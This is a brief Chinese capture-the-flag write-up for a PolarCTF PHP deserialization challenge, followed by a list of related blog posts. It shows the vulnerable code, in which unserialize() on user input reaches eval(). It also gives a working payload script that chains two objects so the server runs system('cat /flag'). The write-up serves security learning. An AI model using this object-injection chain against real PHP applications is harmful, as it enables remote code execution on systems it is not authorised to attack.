【PolarCTF】bllbl_ser1

很基础的一道题

复制代码
class bllbl{
    public $qiang;//我的强
    function  __destruct(){
        $this->bllliang();
    }
    function bllliang(){
        $this->qiang->close();
    }
    }
    class bllnbnl{
     public $er;//我的儿
    function close(){
        eval($this->er);
    }
    }
    if(isset($_GET['blljl'])){
        $user_data=unserialize($_GET['blljl']);
    }

payload如下

复制代码
<?php

class bllbl{
    public $qiang;//我的强
    
    }
class bllnbnl{
    public $er;    }
    
$a = new bllbl();
$b = new bllnbnl();
$a->qiang = $b;
$b->er = "system('cat /flag');";

echo urlencode(serialize($a));

?>

这道题的一些知识点

代码可以只打我们需要的部分

从payload可以看到,我们只需要构造我们需要的部分,class的其他部分可以删除

复制代码
<?php

class bllbl{
    public $qiang;//我的强
    
    }
class bllnbnl{
    public $er;    }

通过eval运行的时候代码后面要加;

在做的过程中犯了一个小毛病,就是system后面没有加; 导致payload一直没打成功

复制代码
$b->er = "system('cat /flag');";
相关推荐
2301_780303902 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
学逆向的3 小时前
汇编——内存
开发语言·汇编·算法·网络安全
学逆向的7 小时前
汇编——位运算
开发语言·汇编·算法·网络安全
数据知道9 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
福来阁86号技师11 小时前
2026-now 网络安全笔记
网络安全·ctf·awd
编程(变成)小辣鸡13 小时前
如何防止接口被恶意刷?
java·后端·网络安全
ylscode20 小时前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
HackTwoHub1 天前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .1 天前
Hackerone-地址栏xss
网络安全·xss
数据知道1 天前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全